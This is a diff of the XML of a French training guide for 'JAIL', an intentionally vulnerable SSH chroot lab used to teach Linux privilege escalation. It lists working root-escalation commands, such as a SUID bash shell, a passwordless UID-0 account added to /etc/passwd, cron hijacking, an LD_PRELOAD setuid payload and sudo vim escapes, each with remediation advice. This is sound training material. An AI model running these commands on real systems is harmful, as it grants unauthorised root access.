-        <w:br/>
-        <w:t>Ref. : Art. 323-1 du Code penal — ANSSI Guide Hygiene v3</w:t>
+        <w:t>Environnement chroot SSH vulnerable pour l'apprentissage des techniques de privilege escalation sous Linux.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -43,27 +21,22 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>1. Presentation du lab</w:t>
+        <w:t>1. Objectif</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>JAIL v2.2 est un environnement chroot SSH vulnerable concu pour l'apprentissage des techniques d'elevation de privileges sous Linux. L'utilisateur "jailed" est enferme dans un chroot via la configuration SSH (Match User + ChrootDirectory) avec un jeu limite de binaires. L'isolation repose entierement sur le ChrootDirectory SSH.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Le lab couvre 5 techniques de privilege escalation :</w:t>
+        <w:t>Ce lab permet de pratiquer differentes techniques d'elevation de privileges dans un environnement isole et controle :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - SUID Bit Exploitation</w:t>
+        <w:t>• SUID Bit Exploitation</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Writable /etc/passwd</w:t>
+        <w:t>• Writable /etc/passwd</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Cron Job Hijacking</w:t>
+        <w:t>• Cron Job Hijacking</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - LD_PRELOAD Injection</w:t>
+        <w:t>• LD_PRELOAD Injection</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Sudo + Vim Escape</w:t>
+        <w:t>• Sudo + Vim Escape</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -71,79 +44,29 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>2. Installation</w:t>
+        <w:t>2. Architecture</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Prerequis : Debian 11/12 (installation minimale), acces root.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Etapes d'installation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>su -</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>apt update &amp;&amp; apt upgrade -y</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>apt install git dos2unix -y</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>cd /opt &amp;&amp; git clone https://github.com/Slurptheworld/Jail.git</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>cd Jail &amp;&amp; dos2unix *.sh &amp;&amp; chmod +x *.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>./setup_jail.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Note : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Le script setup_jail.sh installe automatiquement les dependances manquantes (vim, python3, gcc), cree /etc/passwd et /etc/group dans le chroot (necessaires pour whoami, id, su), et configure le chroot SSH (bloc Match User dans sshd_config).</w:t>
+        <w:t>Le script setup_jail.sh cree un chroot dans /home/jailed avec :</w:t>
+        <w:br/>
+        <w:t>• Binaires : bash, ls, cat, mkdir, rm, touch, python3, vim, env, find, grep, chmod, id, whoami, su, gcc</w:t>
+        <w:br/>
+        <w:t>• Bibliotheques dynamiques copiees avec arborescence complete</w:t>
+        <w:br/>
+        <w:t>• /etc/passwd, /etc/group, /etc/shadow (resolution UID/nom)</w:t>
+        <w:br/>
+        <w:t>• PAM (pam_permit.so) pour su et sudo</w:t>
+        <w:br/>
+        <w:t>• NSS (nsswitch.conf + libnss_files) pour la resolution des noms</w:t>
+        <w:br/>
+        <w:t>• Devices : /dev/null, /dev/tty, /dev/urandom</w:t>
+        <w:br/>
+        <w:t>• Configuration SSH : Match User jailed → ChrootDirectory /home/jailed</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t>L'isolation repose sur le ChrootDirectory SSH (pas sur un shell restreint).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -151,84 +74,41 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>3. Architecture</w:t>
+        <w:t>3. Installation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Prerequis : Debian 11/12 avec acces root.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="NoSpacing"/>
       </w:pPr>
       <w:r>
-        <w:t>Structure du chroot</w:t>
+        <w:t>su -</w:t>
+        <w:br/>
+        <w:t>apt update &amp;&amp; apt upgrade -y</w:t>
+        <w:br/>
+        <w:t>apt install git dos2unix -y</w:t>
+        <w:br/>
+        <w:t>cd /opt</w:t>
+        <w:br/>
+        <w:t>git clone https://github.com/Slurptheworld/Jail.git</w:t>
+        <w:br/>
+        <w:t>cd Jail</w:t>
+        <w:br/>
+        <w:t>dos2unix *.sh</w:t>
+        <w:br/>
+        <w:t>chmod +x *.sh</w:t>
+        <w:br/>
+        <w:t>./setup_jail.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>/home/jailed/           # Racine du chroot (ChrootDirectory)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  bin/                  # bash, ls, cat, mkdir, rm, touch,</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">                        # python3, vim, env, find, grep, chmod,</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">                        # id, whoami, su, gcc</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  lib/ &amp; lib64/         # Bibliotheques dynamiques (arborescence reelle)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  etc/                  # passwd, group (crees par setup_jail.sh)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">                        # shadow, sudoers, pam.d (crees par vuln_sudo_vim.sh)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  tmp/                  # Zone d'ecriture pour les exploits</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  proc/                 # Monte par vuln_sudo_vim.sh</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  dev/                  # null (666), tty (666), urandom (444)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Mecanisme de chroot SSH</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">IMPORTANT : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>L'isolation de l'utilisateur jailed repose entierement sur le ChrootDirectory SSH. L'utilisateur a un shell bash standard (/bin/bash). C'est la directive ChrootDirectory dans sshd_config qui l'enferme dans /home/jailed lors de la connexion SSH.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Configuration ajoutee dans /etc/ssh/sshd_config :</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t xml:space="preserve">  Match User jailed</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">      ChrootDirectory /home/jailed</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">      ForceCommand /bin/bash</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">      AllowTcpForwarding no</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">      X11Forwarding no</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t>Prerequis du ChrootDirectory :</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - /home/jailed et tous ses parents : root:root</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - /home/jailed : 755</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - ForceCommand : /bin/bash (chemin DANS le chroot)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - SSH redemarre apres modification</w:t>
+        <w:t>Note : setup_jail.sh installe automatiquement vim, python3 et gcc si absents, cree les fichiers utilisateurs (passwd, group, shadow), configure PAM et NSS, et met en place le chroot SSH.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -309,15 +189,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>SSH -&gt; Chroot (/bin/bash)</w:t>
+              <w:t>SSH → Chroot</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
     <w:p>
       <w:r>
+        <w:br/>
         <w:t>Connexion : ssh jailed@&lt;IP_DEBIAN&gt;</w:t>
       </w:r>
     </w:p>
@@ -326,41 +206,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>5. Vulnerabilites &amp; Exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="C89600"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-        <w:t>ROLES — Formateur vs Eleve</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="C83232"/>
-        </w:rPr>
-        <w:t xml:space="preserve">FORMATEUR (root sur Debian) : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Active les vulnerabilites avec les scripts vuln_*.sh AVANT que l'eleve se connecte.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="329632"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ELEVE (SSH en tant que jailed) : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Se connecte en SSH et doit decouvrir puis exploiter les failles. Outils : find, grep, id, whoami, sudo -l.</w:t>
+        <w:t>5. Vulnerabilites disponibles</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -368,12 +214,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>5.1 SUID Bit Exploitation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Theorie : SUID = execute avec les droits du proprietaire (root). /bin/bash -p preserve les privileges.</w:t>
+        <w:t>5.1 SUID Bash/Python3 (vuln_suid.sh)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -381,21 +222,26 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sudo ./vuln_suid.sh</w:t>
+        <w:t>Difficulte : Facile</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation :</w:t>
+        <w:t>Le bit SUID sur bash ou python3 permet d'ouvrir un shell root.</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. find / -perm -4000 -type f 2&gt;/dev/null</w:t>
+        <w:t>Detection : find / -perm -4000 -type f 2&gt;/dev/null</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. /bin/bash -p</w:t>
+        <w:t>Exploitation : /bin/bash -p</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. whoami  # root</w:t>
+        <w:t>Remediation : Ne jamais appliquer SUID sur des shells interactifs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5.2 /etc/passwd writable (vuln_passwd.sh)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -403,10 +249,20 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Remediation : </w:t>
+        <w:t>Difficulte : Facile</w:t>
       </w:r>
+    </w:p>
+    <w:p>
       <w:r>
-        <w:t>Ne jamais SUID les shells. Utiliser capabilities.</w:t>
+        <w:t>Si /etc/passwd est modifiable (chmod 666), on peut ajouter un compte root.</w:t>
+        <w:br/>
+        <w:t>Exploitation :</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  echo 'hacker::0:0:hacker:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  su hacker</w:t>
+        <w:br/>
+        <w:t>Remediation : chmod 644 /etc/passwd (root seul peut ecrire).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -414,12 +270,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>5.2 Writable /etc/passwd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Theorie : /etc/passwd modifiable → ajout d'un compte UID 0 sans mot de passe.</w:t>
+        <w:t>5.3 Cron Job Hijacking (vuln_cron.sh)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -427,21 +278,26 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sudo ./vuln_passwd.sh</w:t>
+        <w:t>Difficulte : Moyenne</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation :</w:t>
+        <w:t>Un cron root execute un script modifiable par tous.</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. ls -la /etc/passwd  # verifier 666</w:t>
+        <w:t>Exploitation : Remplacer le script par un payload (cp /bin/bash /tmp/rootbash &amp;&amp; chmod 4755).</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. echo 'hacker::0:0:hacker:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
+        <w:t>Attendre 1 minute, puis /tmp/rootbash -p.</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. su hacker  # root</w:t>
+        <w:t>Remediation : Fichiers cron en 600/644, scripts immutables (chattr +i).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5.4 LD_PRELOAD Injection (vuln_ldpreload.sh)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -449,10 +305,22 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Remediation : </w:t>
+        <w:t>Difficulte : Avancee</w:t>
       </w:r>
+    </w:p>
+    <w:p>
       <w:r>
-        <w:t>chmod 644 /etc/passwd. Surveillance AIDE/OSSEC.</w:t>
+        <w:t>Le binaire env est SUID root. On peut injecter une bibliotheque .so via LD_PRELOAD.</w:t>
+        <w:br/>
+        <w:t>Exploitation :</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  1. Ecrire exploit.c avec _init() { setuid(0); system("/bin/bash"); }</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  2. gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls</w:t>
+        <w:br/>
+        <w:t>Remediation : Ne pas mettre SUID sur env. Restreindre gcc en production.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -460,12 +328,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>5.3 Cron Job Hijacking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Theorie : Cron root + script modifiable = injection de code en root.</w:t>
+        <w:t>5.5 Sudo + Vim Escape (vuln_sudo_vim.sh)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -473,132 +336,24 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sudo ./vuln_cron.sh</w:t>
+        <w:t>Difficulte : Facile</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:t>sudo autorise jailed a executer vim en root sans mot de passe.</w:t>
+        <w:br/>
+        <w:t>Ce script installe sudo, la regle sudoers et monte /proc.</w:t>
+        <w:br/>
+        <w:t>(PAM, NSS et shadow sont deja presents via setup_jail.sh)</w:t>
+        <w:br/>
         <w:t>Exploitation :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. cat /etc/cron.d/vuln_cron</w:t>
+        <w:t xml:space="preserve">  sudo -l  → reperer (ALL) NOPASSWD: /bin/vim</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. Ecrire payload dans malicious.sh</w:t>
+        <w:t xml:space="preserve">  sudo vim -c ':!/bin/bash'  → shell root</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. Attendre 60 sec → /tmp/rootbash -p</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Remediation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Crons 644 root. Scripts immutables. Chemins absolus.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5.4 LD_PRELOAD Injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Theorie : LD_PRELOAD + binaire SUID (env) → injection _init() → shell root.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Activation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sudo ./vuln_ldpreload.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exploitation :</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  1. Creer exploit.c (_init → setuid(0) + system("/bin/bash"))</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  2. gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Remediation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Pas de SUID sur env. Restreindre gcc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5.5 Sudo + Vim Escape</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Theorie : sudo vim NOPASSWD → :shell ou :!/bin/bash → root. Ref: GTFOBins.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Activation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sudo ./vuln_sudo_vim.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Installe : sudo SUID, PAM, NSS, passwd/group/shadow enrichis, sudoers, /proc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exploitation :</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  1. sudo -l  # NOPASSWD: /bin/vim</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  2. sudo /bin/vim</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  3. :set shell=/bin/bash → :shell</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t>Alternative : sudo vim -c ':!/bin/bash'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Remediation : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Ne jamais sudo sur des editeurs. Utiliser sudoedit.</w:t>
+        <w:t>Remediation : Ne jamais donner sudo sur des editeurs. Utiliser sudoedit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -606,22 +361,25 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>6. Commandes de detection</w:t>
+        <w:t>6. Activation des vulnerabilites</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+      </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">  find / -perm -4000 -type f 2&gt;/dev/null   # SUID</w:t>
+        <w:t># En root sur le serveur Debian</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  ls -la /etc/passwd                       # Permissions</w:t>
+        <w:t>sudo ./vuln_suid.sh       # Active SUID</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  cat /etc/cron.d/*                        # Crons</w:t>
+        <w:t>sudo ./vuln_passwd.sh     # Active passwd writable</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  sudo -l                                  # Droits sudo</w:t>
+        <w:t>sudo ./vuln_cron.sh       # Active cron vulnerable</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  id / whoami                              # UID courant</w:t>
+        <w:t>sudo ./vuln_ldpreload.sh  # Active LD_PRELOAD</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  grep -r "pattern" /etc/                  # Configs</w:t>
+        <w:t>sudo ./vuln_sudo_vim.sh   # Active Sudo + Vim (installe sudo + sudoers + /proc)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -634,22 +392,29 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  sudo ./cleanup_jail.sh</w:t>
+        <w:t>Pour remettre la Debian a zero :</w:t>
         <w:br/>
         <w:br/>
-        <w:t>Actions : demontage /proc, suppression utilisateur, suppression /home/jailed, suppression Match User SSH + restart, sudoers, crons, SUID suspects.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:color w:val="C83232"/>
-        </w:rPr>
-        <w:t xml:space="preserve">IMPORTANT : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Ne jamais laisser un environnement vulnerable actif au-dela du TP.</w:t>
+        <w:t>sudo ./cleanup_jail.sh</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t>Ce script supprime :</w:t>
+        <w:br/>
+        <w:t>• /proc monte dans le chroot (demontage)</w:t>
+        <w:br/>
+        <w:t>• L'utilisateur jailed</w:t>
+        <w:br/>
+        <w:t>• Les regles sudo vulnerables</w:t>
+        <w:br/>
+        <w:t>• Le repertoire /home/jailed</w:t>
+        <w:br/>
+        <w:t>• Le bloc Match User dans sshd_config + restart SSH</w:t>
+        <w:br/>
+        <w:t>• Les taches cron malveillantes</w:t>
+        <w:br/>
+        <w:t>• Les binaires SUID suspects</w:t>
+        <w:br/>
+        <w:t>• Les entrees frauduleuses dans /etc/passwd</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -661,27 +426,27 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t>• Interface web interactive : jail-lab.html</w:t>
+        <w:br/>
+        <w:t>• GTFOBins : https://gtfobins.github.io/</w:t>
+        <w:br/>
+        <w:t>• HackTricks Linux PrivEsc : https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
+        <w:br/>
+        <w:br/>
+        <w:t>AVERTISSEMENT : Ce laboratoire est destine uniquement a des fins educatives dans un environnement controle. L'utilisation de ces techniques sur des systemes sans autorisation est illegale.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>GTFOBins : https://gtfobins.github.io/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>HackTricks : https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>MITRE ATT&amp;CK : https://attack.mitre.org</w:t>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Auteur : Slurptheworld</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

</xml_diff>